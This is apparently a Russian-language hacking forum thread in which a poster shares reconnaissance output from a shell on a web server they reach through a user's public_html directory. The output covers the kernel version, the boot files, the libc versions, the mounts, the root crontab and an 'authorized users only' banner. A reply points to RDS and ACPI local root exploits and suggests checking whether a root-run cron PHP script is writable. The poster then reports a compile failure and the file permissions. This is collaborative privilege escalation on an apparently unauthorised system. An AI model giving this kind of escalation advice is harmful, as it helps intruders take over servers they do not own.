-rw-r--r--  1 root root     163 Jan 20  2010 .vmlinuz-2.6.18-164.11.1.el5.hmac
-rw-r--r--  1 root root     158 Sep  3  2009 .vmlinuz-2.6.18-164.el5.hmac
-rw-r--r--  1 root root     163 Nov  9  2010 .vmlinuz-2.6.18-194.26.1.el5.hmac
-rw-r--r--  1 root root 1227215 Jan 20  2010 System.map-2.6.18-164.11.1.el5
-rw-r--r--  1 root root 1225101 Sep  3  2009 System.map-2.6.18-164.el5
-rw-r--r--  1 root root 1243713 Nov  9  2010 System.map-2.6.18-194.26.1.el5
-rw-r--r--  1 root root 1852342 Nov 20  2010 System.map-2.6.35.7-grsec
-rw-r--r--  1 root root    6144 Nov 29  2010 aquota.user
lrwxrwxrwx  1 root root       2 Nov 29  2010 boot -> ..
-rw-r--r--  1 root root   65972 Jan 20  2010 config-2.6.18-164.11.1.el5
-rw-r--r--  1 root root   65937 Sep  3  2009 config-2.6.18-164.el5
-rw-r--r--  1 root root   66892 Nov  9  2010 config-2.6.18-194.26.1.el5
-rw-r--r--  1 root root   55462 Nov 20  2010 config-2.6.35.7-grsec
drwxr-xr-x  3 root root    1024 Nov 29  2010 efi
drwxr-xr-x  2 root root    1024 Nov 30  2010 grub
-rw-------  1 root root 2738962 Feb  8  2010 initrd-2.6.18-164.11.1.el5.img
-rw-------  1 root root 2716904 Oct 25  2009 initrd-2.6.18-164.el5.img
-rw-------  1 root root 2733309 Nov 30  2010 initrd-2.6.18-194.26.1.el5.img
-rw-------  1 root root 2317918 Nov 30  2010 initrd-2.6.35.7-grsec.img
drwx------  2 root root   12288 Oct 26  2009 lost+found
-rw-r--r--  1 root root   80032 Mar 16  2009 message
-rw-r--r--  1 root root      32 Nov 29  2010 quota.user
-rw-r--r--  1 root root  108759 Jan 20  2010 symvers-2.6.18-164.11.1.el5.gz
-rw-r--r--  1 root root  108707 Sep  3  2009 symvers-2.6.18-164.el5.gz
-rw-r--r--  1 root root  112729 Nov  9  2010 symvers-2.6.18-194.26.1.el5.gz
-rwxr-xr-x  1 root root 3838217 Nov 20  2010 vmlinux-2.6.35.7-grsec.bz2
-rw-r--r--  1 root root 1936156 Jan 20  2010 vmlinuz-2.6.18-164.11.1.el5
-rw-r--r--  1 root root 1932284 Sep  3  2009 vmlinuz-2.6.18-164.el5
-rw-r--r--  1 root root 1955356 Nov  9  2010 vmlinuz-2.6.18-194.26.1.el5
-rw-r--r--  1 root root 3453904 Nov 20  2010 vmlinuz-2.6.35.7-grsec
sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1693812 2011-08-12 12:48:50.000000000 -0500 /lib/libc-2.5
.so
lrwxrwxrwx 1 root root      11 2011-09-14 01:23:33.000000000 -0500 /lib/libc.so.
6 -> libc-2.5.so
lrwxrwxrwx 1 root root      14 2010-11-29 07:08:24.000000000 -0600 /lib/libcap.s
o.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root   11560 2007-03-14 13:15:10.000000000 -0500 /lib/libcap.s
o.1.10
-rwxr-xr-x 1 root root  191708 2011-08-12 12:48:50.000000000 -0500 /lib/libcidn-
2.5.so
lrwxrwxrwx 1 root root      14 2011-09-14 01:23:33.000000000 -0500 /lib/libcidn.
so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 2011-09-14 01:23:36.000000000 -0500 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    6364 2011-07-22 00:04:15.000000000 -0500 /lib/libcom_e
rr.so.2.1
-rwxr-xr-x 1 root root   45432 2011-08-12 12:48:50.000000000 -0500 /lib/libcrypt
-2.5.so
lrwxrwxrwx 1 root root      15 2011-09-14 01:23:33.000000000 -0500 /lib/libcrypt
.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-08-13 20:43:56.000000000 -0500 /lib/libcrypt
o.so.0.9.8e
lrwxrwxrwx 1 root root      14 2010-11-29 07:08:18.000000000 -0600 /lib/libcrypt
o.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root      19 2011-09-14 01:23:36.000000000 -0500 /lib/libcrypt
o.so.6 -> libcrypto.so.0.9.8e
sh-3.2$ mount
/dev/sda3 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda1 on /boot type ext2 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
sh-3.2$ df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3             1.4T  664G  640G  51% /
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sda1             119M   31M   88M  27% /boot
/usr/tmpDSK           2.4G  1.1G  1.3G  46% /tmp
sh-3.2$ cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.

sh-3.2$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly

*/5 * * * * root /etc/rrdtool/scripts/indexer cron > /dev/null 2>&1


* * * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/s
ummary.php > /dev/null
0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/s
ummary.daily.php > /dev/null
sh-3.2$ cat /proc/version
Linux version 2.6.35.7-grsec ([email protected]) (gcc version 4.1.2 2
0080704 (Red Hat 4.1.2-48)) #1 SMP Sat Nov 20 02:14:33 CST 2010
sh-3.2$ cat /proc/sys/vm/mmap_min_addr
65536
sh-3.2$ pwd
/home/cardaut1/public_html/webadmin
sh-3.2$

 

ZARO
Думаю, что только если RDS: http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Отпишись потом взялось или нет, если нет, то что вывелось хотя бы.

UPD:
Хотя, судя по дате сборки ядра, оно скорее всего запатчено...
Еще можешь попробовать ACPI: http://www.exploit-db.com/exploits/15774/ но тут я хз.

Code:

0 0 * * * root /usr/bin/php -c /var/server_monitor/php.ini /var/server_monitor/summary.daily.php > /dev/null

Сомневаюсь конечно, но какие у тебя права на /var/server_monitor и на /var/server_monitor/summary.daily.php

 

sh-3.1$ gcc 1.c -o 2nd
1.c: In function 'prep_sock':
1.c:53: error: 'PF_RDS' undeclared (first use in this function)
1.c:53: error: (Each undeclared identifier is reported only once
1.c:53: error: for each function it appears in.)


Это выдает когда компилю http://www.vsecurity.com/download/tools/linux-rds-exploit.c

А второй сплоит не берет

Права на /var/server_monitor -> drwxr-xr-x
Права на /var/server_monitor/summary.daily.php -> -rw-r--r--